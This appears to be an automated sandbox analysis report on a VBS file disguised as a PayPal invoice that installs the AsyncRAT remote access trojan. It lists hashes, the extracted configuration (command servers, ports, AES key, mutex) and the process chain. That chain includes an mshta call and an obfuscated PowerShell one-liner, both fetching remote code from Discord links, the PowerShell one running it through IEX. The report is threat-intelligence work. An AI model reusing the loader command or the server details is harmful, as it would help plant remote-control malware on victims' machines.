Analysis
-
max time kernel
119s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
18-04-2021 13:31
General
-
Target
invoice-order-21412-paypal.xlxs.vbs
-
Size
162B
-
MD5
af9312989a85c937bf50226288f659ab
-
SHA1
ecb5925f60c91a7926579f086642c3f193fa1e64
-
SHA256
fda270ad50aed906730605ca93ecaa3e24792dd070bb443f94d2d6c23124ad61
-
SHA512
113a7dace186edcec5862f4d5fa75cab31ff096c51fac88549e42656eaba60a09660a2115579fc7aab8142b6c6bb65b0342486a522e161f598a103b2167d3413
Malware Config
Extracted
https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt
Extracted
asyncrat
0.5.7B
:6606
:7707
:8808
usa-man.accesscam.org:6606
usa-man.accesscam.org:7707
usa-man.accesscam.org:8808
xaft.camdvr.org:6606
xaft.camdvr.org:7707
xaft.camdvr.org:8808
goodpc.theworkpc.com:6606
goodpc.theworkpc.com:7707
goodpc.theworkpc.com:8808
AsyncMutex_6SI8OkPnk
-
aes_key
9sb1l01wZwOFyWz3WpY3G9vMmrO3T3j5
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
,usa-man.accesscam.org,xaft.camdvr.org,goodpc.theworkpc.com
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6606,7707,8808
-
version
0.5.7B
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Async RAT payload 5 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-order-21412-paypal.xlxs.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/833265385779494912/833265576608530492/Encoding.txt2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://cdn.discordapp.com/attachments/833265385779494912/833265488183820359/Kaspersky.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
f0e4d34ed76525d8f9e4d7330493870d
SHA1e269bbae066db1e3d4d168ef7b39406fe84c2ae1
SHA2566bcd573ce6d631dc7f8444d9a7d395a8e7f9fd74ecaafa40867d31a91ffb146c
SHA512d1e55d8ac5ee0fb9340ec80df996ae4069803f87c65c5fb82e54dff293983d0b129b3e40f78e3bfd12bc5a07f9cf9771abe8748cb1064f6b362ea192108fdc18
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
6e30e0bef3ff5acf5c4b5429314584bf
SHA1c2641c710c9f6190786ed73f82b7b5969258e31f
SHA2565895df6209b2df04b8ade3c38a7556923614ac2ead4980328263820fdca8edcf
SHA512cf08a60bda5f6b2301c412716dac6b75bc681f52b1cb5d65b65cfb8a978cab3ae652a5ff993cb8ffa5047fd94547904b61d5709cfd503f4e5c438964bb8fb660
-
memory/632-70-0x000000001B600000-0x000000001B601000-memory.dmpFilesize
4KB
-
memory/632-61-0x0000000000000000-mapping.dmp
-
memory/632-64-0x000000001AC50000-0x000000001AC51000-memory.dmpFilesize
4KB
-
memory/632-65-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/632-66-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/632-67-0x000000001ABD0000-0x000000001ABD2000-memory.dmpFilesize
8KB
-
memory/632-68-0x000000001ABD4000-0x000000001ABD6000-memory.dmpFilesize
8KB
-
memory/632-69-0x000000001C4F0000-0x000000001C4F1000-memory.dmpFilesize
4KB
-
memory/632-75-0x0000000002670000-0x0000000002671000-memory.dmpFilesize
4KB
-
memory/632-63-0x0000000002260000-0x0000000002261000-memory.dmpFilesize
4KB
-
memory/632-72-0x0000000002560000-0x000000000257F000-memory.dmpFilesize
124KB
-
memory/1104-59-0x000007FEFC4D1000-0x000007FEFC4D3000-memory.dmpFilesize
8KB
-
memory/1176-60-0x0000000000000000-mapping.dmp
-
memory/1420-73-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/1420-74-0x000000000040C79E-mapping.dmp
-
memory/1420-76-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/1420-78-0x0000000076E11000-0x0000000076E13000-memory.dmpFilesize
8KB
-
memory/1420-79-0x0000000004C00000-0x0000000004C01000-memory.dmpFilesize
4KB
-
memory/1420-81-0x0000000004130000-0x000000000414D000-memory.dmpFilesize
116KB
-
memory/1420-82-0x0000000005400000-0x0000000005440000-memory.dmpFilesize
256KB